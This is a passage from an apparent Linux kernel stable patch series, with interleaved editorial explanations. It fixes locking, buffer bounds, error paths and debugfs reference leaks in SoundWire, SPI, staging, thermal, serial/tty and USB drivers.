+-	mutex_lock(&slave->sdw_dev_lock);
+-
+ 	ret = drv->probe(slave, id);
+ 	if (ret) {
+ 		name = drv->name;
+ 		if (!name)
+ 			name = drv->driver.name;
+-		mutex_unlock(&slave->sdw_dev_lock);
+ 
+ 		dev_err(dev, "Probe of %s failed: %d\n", name, ret);
+ 		dev_pm_domain_detach(dev, false);
+ 		return ret;
+ 	}
+ 
++	mutex_lock(&slave->sdw_dev_lock);
++
+ 	/* device is probed so let's read the properties now */
+ 	if (drv->ops && drv->ops->read_prop)
+ 		drv->ops->read_prop(slave);
+@@ -167,14 +166,12 @@ static int sdw_drv_remove(struct device *dev)
+ 	int ret = 0;
+ 
+ 	mutex_lock(&slave->sdw_dev_lock);
+-
+ 	slave->probed = false;
++	mutex_unlock(&slave->sdw_dev_lock);
+ 
+ 	if (drv->remove)
+ 		ret = drv->remove(slave);
+ 
+-	mutex_unlock(&slave->sdw_dev_lock);
+-
+ 	dev_pm_domain_detach(dev, false);
+ 
+ 	return ret;
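[editor's note] The SoundWire changes narrow sdw_dev_lock so it is never held across the client driver's probe() or remove() callback; a callback that itself takes the same mutex (directly or via bus helpers) would deadlock. State updates such as slave->probed stay under the lock, but the callback runs outside it, as in the remove path:

mutex_lock(&slave->sdw_dev_lock);
slave->probed = false;			/* state change stays protected */
mutex_unlock(&slave->sdw_dev_lock);

if (drv->remove)
	ret = drv->remove(slave);	/* driver callback runs unlocked */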
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index b65cdf2a7593e..e7da7d7b213fb 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -555,6 +555,29 @@ cdns_fill_msg_resp(struct sdw_cdns *cdns,
+ 	return SDW_CMD_OK;
+ }
+ 
++static void cdns_read_response(struct sdw_cdns *cdns)
++{
++	u32 num_resp, cmd_base;
++	int i;
++
++	/* RX_FIFO_AVAIL can be 2 entries more than the FIFO size */
++	BUILD_BUG_ON(ARRAY_SIZE(cdns->response_buf) < CDNS_MCP_CMD_LEN + 2);
++
++	num_resp = cdns_readl(cdns, CDNS_MCP_FIFOSTAT);
++	num_resp &= CDNS_MCP_RX_FIFO_AVAIL;
++	if (num_resp > ARRAY_SIZE(cdns->response_buf)) {
++		dev_warn(cdns->dev, "RX AVAIL %d too long\n", num_resp);
++		num_resp = ARRAY_SIZE(cdns->response_buf);
++	}
++
++	cmd_base = CDNS_MCP_CMD_BASE;
++
++	for (i = 0; i < num_resp; i++) {
++		cdns->response_buf[i] = cdns_readl(cdns, cmd_base);
++		cmd_base += CDNS_MCP_CMD_WORD_LEN;
++	}
++}
++
+ static enum sdw_command_response
+ _cdns_xfer_msg(struct sdw_cdns *cdns, struct sdw_msg *msg, int cmd,
+ 	       int offset, int count, bool defer)
+@@ -596,6 +619,10 @@ _cdns_xfer_msg(struct sdw_cdns *cdns, struct sdw_msg *msg, int cmd,
+ 		dev_err(cdns->dev, "IO transfer timed out, cmd %d device %d addr %x len %d\n",
+ 			cmd, msg->dev_num, msg->addr, msg->len);
+ 		msg->len = 0;
++
++		/* Drain anything in the RX_FIFO */
++		cdns_read_response(cdns);
++
+ 		return SDW_CMD_TIMEOUT;
+ 	}
+ 
+@@ -769,22 +796,6 @@ EXPORT_SYMBOL(cdns_read_ping_status);
+  * IRQ handling
+  */
+ 
+-static void cdns_read_response(struct sdw_cdns *cdns)
+-{
+-	u32 num_resp, cmd_base;
+-	int i;
+-
+-	num_resp = cdns_readl(cdns, CDNS_MCP_FIFOSTAT);
+-	num_resp &= CDNS_MCP_RX_FIFO_AVAIL;
+-
+-	cmd_base = CDNS_MCP_CMD_BASE;
+-
+-	for (i = 0; i < num_resp; i++) {
+-		cdns->response_buf[i] = cdns_readl(cdns, cmd_base);
+-		cmd_base += CDNS_MCP_CMD_WORD_LEN;
+-	}
+-}
+-
+ static int cdns_update_slave_status(struct sdw_cdns *cdns,
+ 				    u64 slave_intstat)
+ {
+diff --git a/drivers/soundwire/cadence_master.h b/drivers/soundwire/cadence_master.h
+index ca9e805bab88f..51e6ecc027cbc 100644
+--- a/drivers/soundwire/cadence_master.h
++++ b/drivers/soundwire/cadence_master.h
+@@ -8,6 +8,12 @@
+ #define SDW_CADENCE_GSYNC_KHZ		4 /* 4 kHz */
+ #define SDW_CADENCE_GSYNC_HZ		(SDW_CADENCE_GSYNC_KHZ * 1000)
+ 
++/*
++ * The Cadence IP supports up to 32 entries in the FIFO, though implementations
++ * can configure the IP to have a smaller FIFO.
++ */
++#define CDNS_MCP_IP_MAX_CMD_LEN		32
++
+ /**
+  * struct sdw_cdns_pdi: PDI (Physical Data Interface) instance
+  *
+@@ -114,7 +120,12 @@ struct sdw_cdns {
+ 	struct sdw_bus bus;
+ 	unsigned int instance;
+ 
+-	u32 response_buf[0x80];
++	/*
++	 * The datasheet says the RX FIFO AVAIL can be 2 entries more
++	 * than the FIFO capacity, so allow for this.
++	 */
++	u32 response_buf[CDNS_MCP_IP_MAX_CMD_LEN + 2];
++
+ 	struct completion tx_complete;
+ 	struct sdw_defer *defer;
+ 
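[editor's note] The Cadence fixes are defensive on two fronts: response_buf grows from an arbitrary 0x80 entries to CDNS_MCP_IP_MAX_CMD_LEN + 2 (the datasheet allows RX_FIFO_AVAIL to report up to two entries beyond the FIFO capacity), and cdns_read_response() now clamps the hardware-reported count before indexing the buffer, with a BUILD_BUG_ON tying the two constants together at compile time. The clamp-then-copy idiom, as a kernel-context sketch with hypothetical accessors:

num = hw_read_avail(dev);		/* hypothetical register read */
if (num > ARRAY_SIZE(buf)) {
	dev_warn(dev, "avail %u exceeds buffer\n", num);
	num = ARRAY_SIZE(buf);		/* never trust a hardware count */
}
for (i = 0; i < num; i++)
	buf[i] = hw_read_entry(dev, i);	/* hypothetical */

Draining the FIFO after a command timeout also keeps a late response from being misattributed to the next command.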
+diff --git a/drivers/spi/spi-tegra210-quad.c b/drivers/spi/spi-tegra210-quad.c
+index 9f356612ba7e5..06c54d49076ae 100644
+--- a/drivers/spi/spi-tegra210-quad.c
++++ b/drivers/spi/spi-tegra210-quad.c
+@@ -1156,6 +1156,10 @@ static int tegra_qspi_combined_seq_xfer(struct tegra_qspi *tqspi,
+ 				ret = -EIO;
+ 				goto exit;
+ 			}
++			if (!xfer->cs_change) {
++				tegra_qspi_transfer_end(spi);
++				spi_transfer_delay_exec(xfer);
++			}
+ 			break;
+ 		default:
+ 			ret = -EINVAL;
+@@ -1164,14 +1168,14 @@ static int tegra_qspi_combined_seq_xfer(struct tegra_qspi *tqspi,
+ 		msg->actual_length += xfer->len;
+ 		transfer_phase++;
+ 	}
+-	if (!xfer->cs_change) {
+-		tegra_qspi_transfer_end(spi);
+-		spi_transfer_delay_exec(xfer);
+-	}
+ 	ret = 0;
+ 
+ exit:
+ 	msg->status = ret;
++	if (ret < 0) {
++		tegra_qspi_transfer_end(spi);
++		spi_transfer_delay_exec(xfer);
++	}
+ 
+ 	return ret;
+ }
+@@ -1297,7 +1301,7 @@ static bool tegra_qspi_validate_cmb_seq(struct tegra_qspi *tqspi,
+ 	if (xfer->len > 4 || xfer->len < 3)
+ 		return false;
+ 	xfer = list_next_entry(xfer, transfer_list);
+-	if (!tqspi->soc_data->has_dma || xfer->len > (QSPI_FIFO_DEPTH << 2))
++	if (!tqspi->soc_data->has_dma && xfer->len > (QSPI_FIFO_DEPTH << 2))
+ 		return false;
+ 
+ 	return true;
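[editor's note] The tegra210-quad hunks fix two issues: chip-select is now released per transfer inside the loop (and on the error exit) rather than once after the loop via a stale xfer pointer, and the combined-sequence validation flips from || to &&. The old test rejected any transfer larger than the FIFO even when DMA was available; the corrected logic only rejects large transfers when DMA is absent:

/* old: fails whenever len > fifo bytes, even with DMA */
if (!has_dma || len > fifo_bytes)
	return false;

/* new: only PIO-only controllers are limited by FIFO depth */
if (!has_dma && len > fifo_bytes)
	return false;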
+diff --git a/drivers/staging/emxx_udc/emxx_udc.c b/drivers/staging/emxx_udc/emxx_udc.c
+index b6abd3770e81c..edd20a03f7a26 100644
+--- a/drivers/staging/emxx_udc/emxx_udc.c
++++ b/drivers/staging/emxx_udc/emxx_udc.c
+@@ -2590,10 +2590,15 @@ static int nbu2ss_ep_queue(struct usb_ep *_ep,
+ 		req->unaligned = false;
+ 
+ 	if (req->unaligned) {
+-		if (!ep->virt_buf)
++		if (!ep->virt_buf) {
+ 			ep->virt_buf = dma_alloc_coherent(udc->dev, PAGE_SIZE,
+ 							  &ep->phys_buf,
+ 							  GFP_ATOMIC | GFP_DMA);
++			if (!ep->virt_buf) {
++				spin_unlock_irqrestore(&udc->lock, flags);
++				return -ENOMEM;
++			}
++		}
+ 		if (ep->epnum > 0)  {
+ 			if (ep->direct == USB_DIR_IN)
+ 				memcpy(ep->virt_buf, req->req.buf,
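[editor's note] The emxx_udc hunk adds the missing dma_alloc_coherent() failure check; because the caller holds udc->lock with interrupts saved, the new error path must restore that state before returning:

if (!ep->virt_buf) {
	spin_unlock_irqrestore(&udc->lock, flags);
	return -ENOMEM;		/* never return with the lock held */
}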
+diff --git a/drivers/staging/pi433/pi433_if.c b/drivers/staging/pi433/pi433_if.c
+index d4e06a3929f3d..b59f6a4cb611a 100644
+--- a/drivers/staging/pi433/pi433_if.c
++++ b/drivers/staging/pi433/pi433_if.c
+@@ -55,6 +55,7 @@
+ static dev_t pi433_dev;
+ static DEFINE_IDR(pi433_idr);
+ static DEFINE_MUTEX(minor_lock); /* Protect idr accesses */
++static struct dentry *root_dir;	/* debugfs root directory for the driver */
+ 
+ static struct class *pi433_class; /* mainly for udev to create /dev/pi433 */
+ 
+@@ -1306,8 +1307,7 @@ static int pi433_probe(struct spi_device *spi)
+ 	/* spi setup */
+ 	spi_set_drvdata(spi, device);
+ 
+-	entry = debugfs_create_dir(dev_name(device->dev),
+-				   debugfs_lookup(KBUILD_MODNAME, NULL));
++	entry = debugfs_create_dir(dev_name(device->dev), root_dir);
+ 	debugfs_create_file("regs", 0400, entry, device, &pi433_debugfs_regs_fops);
+ 
+ 	return 0;
+@@ -1333,9 +1333,8 @@ RX_failed:
+ static void pi433_remove(struct spi_device *spi)
+ {
+ 	struct pi433_device	*device = spi_get_drvdata(spi);
+-	struct dentry *mod_entry = debugfs_lookup(KBUILD_MODNAME, NULL);
+ 
+-	debugfs_remove(debugfs_lookup(dev_name(device->dev), mod_entry));
++	debugfs_lookup_and_remove(dev_name(device->dev), root_dir);
+ 
+ 	/* free GPIOs */
+ 	free_gpio(device);
+@@ -1408,7 +1407,7 @@ static int __init pi433_init(void)
+ 		return PTR_ERR(pi433_class);
+ 	}
+ 
+-	debugfs_create_dir(KBUILD_MODNAME, NULL);
++	root_dir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+ 	status = spi_register_driver(&pi433_spi_driver);
+ 	if (status < 0) {
+@@ -1427,7 +1426,7 @@ static void __exit pi433_exit(void)
+ 	spi_unregister_driver(&pi433_spi_driver);
+ 	class_destroy(pi433_class);
+ 	unregister_chrdev(MAJOR(pi433_dev), pi433_spi_driver.driver.name);
+-	debugfs_remove_recursive(debugfs_lookup(KBUILD_MODNAME, NULL));
++	debugfs_remove(root_dir);
+ }
+ module_exit(pi433_exit);
+ 
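[editor's note] The pi433 conversion is the template for the many debugfs changes later in this patch (pch_uart, chipidea, ulpi, usb core, dwc3, the gadget UDCs and HCDs): debugfs_lookup() returns a dentry with an elevated refcount that the old debugfs_remove(debugfs_lookup(...)) pattern never dropped, leaking the dentry. The fixes either cache the dentry created at init time or call debugfs_lookup_and_remove(), which releases the reference it takes. A kernel-context sketch with illustrative names:

static struct dentry *root_dir;	/* cached at module init */

static int __init my_init(void)
{
	root_dir = debugfs_create_dir("mydrv", NULL);
	return 0;
}

static void my_remove_one(const char *name)
{
	/* looks up, removes, and puts the reference in one call */
	debugfs_lookup_and_remove(name, root_dir);
}

static void __exit my_exit(void)
{
	debugfs_remove(root_dir);	/* plain remove on a cached dentry */
}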
+diff --git a/drivers/thermal/intel/Kconfig b/drivers/thermal/intel/Kconfig
+index f0c8456792509..e3cfad10d5dd4 100644
+--- a/drivers/thermal/intel/Kconfig
++++ b/drivers/thermal/intel/Kconfig
+@@ -64,7 +64,8 @@ endmenu
+ 
+ config INTEL_BXT_PMIC_THERMAL
+ 	tristate "Intel Broxton PMIC thermal driver"
+-	depends on X86 && INTEL_SOC_PMIC_BXTWC && REGMAP
++	depends on X86 && INTEL_SOC_PMIC_BXTWC
++	select REGMAP
+ 	help
+ 	  Select this driver for Intel Broxton PMIC with ADC channels monitoring
+ 	  system temperature measurements and alerts.
+diff --git a/drivers/thermal/intel/intel_quark_dts_thermal.c b/drivers/thermal/intel/intel_quark_dts_thermal.c
+index 3eafc6b0e6c30..b43fbd5eaa6b4 100644
+--- a/drivers/thermal/intel/intel_quark_dts_thermal.c
++++ b/drivers/thermal/intel/intel_quark_dts_thermal.c
+@@ -415,22 +415,14 @@ MODULE_DEVICE_TABLE(x86cpu, qrk_thermal_ids);
+ 
+ static int __init intel_quark_thermal_init(void)
+ {
+-	int err = 0;
+-
+ 	if (!x86_match_cpu(qrk_thermal_ids) || !iosf_mbi_available())
+ 		return -ENODEV;
+ 
+ 	soc_dts = alloc_soc_dts();
+-	if (IS_ERR(soc_dts)) {
+-		err = PTR_ERR(soc_dts);
+-		goto err_free;
+-	}
++	if (IS_ERR(soc_dts))
++		return PTR_ERR(soc_dts);
+ 
+ 	return 0;
+-
+-err_free:
+-	free_soc_dts(soc_dts);
+-	return err;
+ }
+ 
+ static void __exit intel_quark_thermal_exit(void)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 13a6cd0116a13..f9d667ce1619e 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1468,12 +1468,32 @@ static void lpuart_break_ctl(struct uart_port *port, int break_state)
+ 
+ static void lpuart32_break_ctl(struct uart_port *port, int break_state)
+ {
+-	unsigned long temp;
++	unsigned long temp, modem;
++	struct tty_struct *tty;
++	unsigned int cflag = 0;
++
++	tty = tty_port_tty_get(&port->state->port);
++	if (tty) {
++		cflag = tty->termios.c_cflag;
++		tty_kref_put(tty);
++	}
+ 
+ 	temp = lpuart32_read(port, UARTCTRL) & ~UARTCTRL_SBK;
++	modem = lpuart32_read(port, UARTMODIR);
+ 
+-	if (break_state != 0)
++	if (break_state != 0) {
+ 		temp |= UARTCTRL_SBK;
++		/*
++		 * LPUART CTS has higher priority than SBK, need to disable CTS before
++		 * asserting SBK to avoid any interference if flow control is enabled.
++		 */
++		if (cflag & CRTSCTS && modem & UARTMODIR_TXCTSE)
++			lpuart32_write(port, modem & ~UARTMODIR_TXCTSE, UARTMODIR);
++	} else {
++		/* Re-enable the CTS when break off. */
++		if (cflag & CRTSCTS && !(modem & UARTMODIR_TXCTSE))
++			lpuart32_write(port, modem | UARTMODIR_TXCTSE, UARTMODIR);
++	}
+ 
+ 	lpuart32_write(port, temp, UARTCTRL);
+ }
+diff --git a/drivers/tty/serial/pch_uart.c b/drivers/tty/serial/pch_uart.c
+index 83f35b7b0897c..abff1c6470f6a 100644
+--- a/drivers/tty/serial/pch_uart.c
++++ b/drivers/tty/serial/pch_uart.c
+@@ -1779,7 +1779,7 @@ static void pch_uart_exit_port(struct eg20t_port *priv)
+ 	char name[32];
+ 
+ 	snprintf(name, sizeof(name), "uart%d_regs", priv->port.line);
+-	debugfs_remove(debugfs_lookup(name, NULL));
++	debugfs_lookup_and_remove(name, NULL);
+ 	uart_remove_one_port(&pch_uart_driver, &priv->port);
+ 	free_page((unsigned long)priv->rxbuf.buf);
+ }
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 524921360ca78..93cf5f7888172 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -1426,25 +1426,6 @@ static int sc16is7xx_probe(struct device *dev,
+ 	}
+ 	sched_set_fifo(s->kworker_task);
+ 
+-#ifdef CONFIG_GPIOLIB
+-	if (devtype->nr_gpio) {
+-		/* Setup GPIO cotroller */
+-		s->gpio.owner		 = THIS_MODULE;
+-		s->gpio.parent		 = dev;
+-		s->gpio.label		 = dev_name(dev);
+-		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
+-		s->gpio.get		 = sc16is7xx_gpio_get;
+-		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
+-		s->gpio.set		 = sc16is7xx_gpio_set;
+-		s->gpio.base		 = -1;
+-		s->gpio.ngpio		 = devtype->nr_gpio;
+-		s->gpio.can_sleep	 = 1;
+-		ret = gpiochip_add_data(&s->gpio, s);
+-		if (ret)
+-			goto out_thread;
+-	}
+-#endif
+-
+ 	/* reset device, purging any pending irq / data */
+ 	regmap_write(s->regmap, SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
+ 			SC16IS7XX_IOCONTROL_SRESET_BIT);
+@@ -1521,6 +1502,25 @@ static int sc16is7xx_probe(struct device *dev,
+ 				s->p[u].irda_mode = true;
+ 	}
+ 
++#ifdef CONFIG_GPIOLIB
++	if (devtype->nr_gpio) {
++		/* Setup GPIO cotroller */
++		s->gpio.owner		 = THIS_MODULE;
++		s->gpio.parent		 = dev;
++		s->gpio.label		 = dev_name(dev);
++		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
++		s->gpio.get		 = sc16is7xx_gpio_get;
++		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
++		s->gpio.set		 = sc16is7xx_gpio_set;
++		s->gpio.base		 = -1;
++		s->gpio.ngpio		 = devtype->nr_gpio;
++		s->gpio.can_sleep	 = 1;
++		ret = gpiochip_add_data(&s->gpio, s);
++		if (ret)
++			goto out_thread;
++	}
++#endif
++
+ 	/*
+ 	 * Setup interrupt. We first try to acquire the IRQ line as level IRQ.
+ 	 * If that succeeds, we can allow sharing the interrupt as well.
+@@ -1540,18 +1540,19 @@ static int sc16is7xx_probe(struct device *dev,
+ 	if (!ret)
+ 		return 0;
+ 
+-out_ports:
+-	for (i--; i >= 0; i--) {
+-		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+-		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
+-	}
+-
+ #ifdef CONFIG_GPIOLIB
+ 	if (devtype->nr_gpio)
+ 		gpiochip_remove(&s->gpio);
+ 
+ out_thread:
+ #endif
++
++out_ports:
++	for (i--; i >= 0; i--) {
++		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
++		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
++	}
++
+ 	kthread_stop(s->kworker_task);
+ 
+ out_clk:
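[editor's note] The sc16is7xx reordering shows why goto-unwind labels must mirror setup order: the GPIO controller is now registered after the UART ports, so the error ladder is rearranged to tear down the GPIO chip first, then the ports. The generic shape of the idiom, with hypothetical steps:

ret = setup_a();
if (ret)
	goto out;
ret = setup_b();
if (ret)
	goto undo_a;
ret = setup_c();
if (ret)
	goto undo_b;
return 0;

undo_b:
	teardown_b();
undo_a:
	teardown_a();
out:
	return ret;

Each label undoes exactly the steps that succeeded before the failure, in reverse order; reordering the setup without reordering the labels leaves resources leaked or double-freed.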
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index de06c3c2ff70a..1ac6784ea1f92 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -1224,14 +1224,16 @@ static struct tty_struct *tty_driver_lookup_tty(struct tty_driver *driver,
+ {
+ 	struct tty_struct *tty;
+ 
+-	if (driver->ops->lookup)
++	if (driver->ops->lookup) {
+ 		if (!file)
+ 			tty = ERR_PTR(-EIO);
+ 		else
+ 			tty = driver->ops->lookup(driver, file, idx);
+-	else
++	} else {
++		if (idx >= driver->num)
++			return ERR_PTR(-EINVAL);
+ 		tty = driver->ttys[idx];
+-
++	}
+ 	if (!IS_ERR(tty))
+ 		tty_kref_get(tty);
+ 	return tty;
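[editor's note] tty_driver_lookup_tty() gains an explicit bounds check before indexing driver->ttys[]; drivers supplying their own ->lookup() validate idx themselves, but the default path indexed the array with a caller-derived value. The shape of the fix:

if (idx >= driver->num)
	return ERR_PTR(-EINVAL);	/* validate before indexing */
tty = driver->ttys[idx];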
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index 71e091f879f0e..1dc07f9214d57 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -415,10 +415,8 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		 */
+ 		size = vcs_size(vc, attr, uni_mode);
+ 		if (size < 0) {
+-			if (read)
+-				break;
+ 			ret = size;
+-			goto unlock_out;
++			break;
+ 		}
+ 		if (pos >= size)
+ 			break;
+diff --git a/drivers/usb/chipidea/debug.c b/drivers/usb/chipidea/debug.c
+index faf6b078b6c44..bbc610e5bd69c 100644
+--- a/drivers/usb/chipidea/debug.c
++++ b/drivers/usb/chipidea/debug.c
+@@ -364,5 +364,5 @@ void dbg_create_files(struct ci_hdrc *ci)
+  */
+ void dbg_remove_files(struct ci_hdrc *ci)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(ci->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(ci->dev), usb_debug_root);
+ }
+diff --git a/drivers/usb/common/ulpi.c b/drivers/usb/common/ulpi.c
+index d7c8461976ce0..38703781ee2d1 100644
+--- a/drivers/usb/common/ulpi.c
++++ b/drivers/usb/common/ulpi.c
+@@ -271,7 +271,7 @@ static int ulpi_regs_show(struct seq_file *seq, void *data)
+ }
+ DEFINE_SHOW_ATTRIBUTE(ulpi_regs);
+ 
+-#define ULPI_ROOT debugfs_lookup(KBUILD_MODNAME, NULL)
++static struct dentry *ulpi_root;
+ 
+ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ {
+@@ -301,7 +301,7 @@ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ 		return ret;
+ 	}
+ 
+-	root = debugfs_create_dir(dev_name(dev), ULPI_ROOT);
++	root = debugfs_create_dir(dev_name(dev), ulpi_root);
+ 	debugfs_create_file("regs", 0444, root, ulpi, &ulpi_regs_fops);
+ 
+ 	dev_dbg(&ulpi->dev, "registered ULPI PHY: vendor %04x, product %04x\n",
+@@ -349,8 +349,7 @@ EXPORT_SYMBOL_GPL(ulpi_register_interface);
+  */
+ void ulpi_unregister_interface(struct ulpi *ulpi)
+ {
+-	debugfs_remove_recursive(debugfs_lookup(dev_name(&ulpi->dev),
+-						ULPI_ROOT));
++	debugfs_lookup_and_remove(dev_name(&ulpi->dev), ulpi_root);
+ 	device_unregister(&ulpi->dev);
+ }
+ EXPORT_SYMBOL_GPL(ulpi_unregister_interface);
+@@ -360,12 +359,11 @@ EXPORT_SYMBOL_GPL(ulpi_unregister_interface);
+ static int __init ulpi_init(void)
+ {
+ 	int ret;
+-	struct dentry *root;
+ 
+-	root = debugfs_create_dir(KBUILD_MODNAME, NULL);
++	ulpi_root = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 	ret = bus_register(&ulpi_bus);
+ 	if (ret)
+-		debugfs_remove(root);
++		debugfs_remove(ulpi_root);
+ 	return ret;
+ }
+ subsys_initcall(ulpi_init);
+@@ -373,7 +371,7 @@ subsys_initcall(ulpi_init);
+ static void __exit ulpi_exit(void)
+ {
+ 	bus_unregister(&ulpi_bus);
+-	debugfs_remove_recursive(ULPI_ROOT);
++	debugfs_remove(ulpi_root);
+ }
+ module_exit(ulpi_exit);
+ 
+diff --git a/drivers/usb/core/usb.c b/drivers/usb/core/usb.c
+index 11b15d7b357ad..a415206cab043 100644
+--- a/drivers/usb/core/usb.c
++++ b/drivers/usb/core/usb.c
+@@ -998,7 +998,7 @@ static void usb_debugfs_init(void)
+ 
+ static void usb_debugfs_cleanup(void)
+ {
+-	debugfs_remove(debugfs_lookup("devices", usb_debug_root));
++	debugfs_lookup_and_remove("devices", usb_debug_root);
+ }
+ 
+ /*
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 8f9959ba9fd46..582ebd9cf9c2e 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -1117,6 +1117,7 @@ struct dwc3_scratchpad_array {
+  *		     address.
+  * @num_ep_resized: carries the current number endpoints which have had its tx
+  *		    fifo resized.
++ * @debug_root: root debugfs directory for this device to put its files in.
+  */
+ struct dwc3 {
+ 	struct work_struct	drd_work;
+@@ -1332,6 +1333,7 @@ struct dwc3 {
+ 	int			max_cfg_eps;
+ 	int			last_fifo_depth;
+ 	int			num_ep_resized;
++	struct dentry		*debug_root;
+ };
+ 
+ #define INCRX_BURST_MODE 0
+diff --git a/drivers/usb/dwc3/debug.h b/drivers/usb/dwc3/debug.h
+index 48b44b88dc252..8bb2c9e3b9ac6 100644
+--- a/drivers/usb/dwc3/debug.h
++++ b/drivers/usb/dwc3/debug.h
+@@ -414,11 +414,14 @@ static inline const char *dwc3_gadget_generic_cmd_status_string(int status)
+ 
+ #ifdef CONFIG_DEBUG_FS
+ extern void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep);
++extern void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep);
+ extern void dwc3_debugfs_init(struct dwc3 *d);
+ extern void dwc3_debugfs_exit(struct dwc3 *d);
+ #else
+ static inline void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
+ {  }
++static inline void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep)
++{  }
+ static inline void dwc3_debugfs_init(struct dwc3 *d)
+ {  }
+ static inline void dwc3_debugfs_exit(struct dwc3 *d)
+diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
+index f2b7675c7f621..850df0e6bcabf 100644
+--- a/drivers/usb/dwc3/debugfs.c
++++ b/drivers/usb/dwc3/debugfs.c
+@@ -873,27 +873,23 @@ static const struct dwc3_ep_file_map dwc3_ep_file_map[] = {
+ 	{ "GDBGEPINFO", &dwc3_ep_info_register_fops, },
+ };
+ 
+-static void dwc3_debugfs_create_endpoint_files(struct dwc3_ep *dep,
+-		struct dentry *parent)
++void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
+ {
++	struct dentry		*dir;
+ 	int			i;
+ 
++	dir = debugfs_create_dir(dep->name, dep->dwc->debug_root);
+ 	for (i = 0; i < ARRAY_SIZE(dwc3_ep_file_map); i++) {
+ 		const struct file_operations *fops = dwc3_ep_file_map[i].fops;
+ 		const char *name = dwc3_ep_file_map[i].name;
+ 
+-		debugfs_create_file(name, 0444, parent, dep, fops);
++		debugfs_create_file(name, 0444, dir, dep, fops);
+ 	}
+ }
+ 
+-void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
++void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep)
+ {
+-	struct dentry		*dir;
+-	struct dentry		*root;
+-
+-	root = debugfs_lookup(dev_name(dep->dwc->dev), usb_debug_root);
+-	dir = debugfs_create_dir(dep->name, root);
+-	dwc3_debugfs_create_endpoint_files(dep, dir);
++	debugfs_lookup_and_remove(dep->name, dep->dwc->debug_root);
+ }
+ 
+ void dwc3_debugfs_init(struct dwc3 *dwc)
+@@ -911,6 +907,7 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 	dwc->regset->base = dwc->regs - DWC3_GLOBALS_REGS_START;
+ 
+ 	root = debugfs_create_dir(dev_name(dwc->dev), usb_debug_root);
++	dwc->debug_root = root;
+ 	debugfs_create_regset32("regdump", 0444, root, dwc->regset);
+ 	debugfs_create_file("lsp_dump", 0644, root, dwc, &dwc3_lsp_fops);
+ 
+@@ -929,6 +926,6 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 
+ void dwc3_debugfs_exit(struct dwc3 *dwc)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(dwc->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(dwc->dev), usb_debug_root);
+ 	kfree(dwc->regset);
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index ed958da0e1c96..df1ce96fa2281 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -3184,9 +3184,7 @@ static void dwc3_gadget_free_endpoints(struct dwc3 *dwc)
+ 			list_del(&dep->endpoint.ep_list);
+ 		}
+ 
+-		debugfs_remove_recursive(debugfs_lookup(dep->name,
+-				debugfs_lookup(dev_name(dep->dwc->dev),
+-					       usb_debug_root)));
++		dwc3_debugfs_remove_endpoint_dir(dep);
+ 		kfree(dep);
+ 	}
+ }
+diff --git a/drivers/usb/gadget/function/uvc_configfs.c b/drivers/usb/gadget/function/uvc_configfs.c
+index 4303a3283ba0a..015a7bbd9bbfe 100644
+--- a/drivers/usb/gadget/function/uvc_configfs.c
++++ b/drivers/usb/gadget/function/uvc_configfs.c
+@@ -483,11 +483,68 @@ UVC_ATTR_RO(uvcg_default_output_, cname, aname)
+ UVCG_DEFAULT_OUTPUT_ATTR(b_terminal_id, bTerminalID, 8);
+ UVCG_DEFAULT_OUTPUT_ATTR(w_terminal_type, wTerminalType, 16);
+ UVCG_DEFAULT_OUTPUT_ATTR(b_assoc_terminal, bAssocTerminal, 8);
+-UVCG_DEFAULT_OUTPUT_ATTR(b_source_id, bSourceID, 8);
+ UVCG_DEFAULT_OUTPUT_ATTR(i_terminal, iTerminal, 8);
+ 
+ #undef UVCG_DEFAULT_OUTPUT_ATTR
+ 
++static ssize_t uvcg_default_output_b_source_id_show(struct config_item *item,
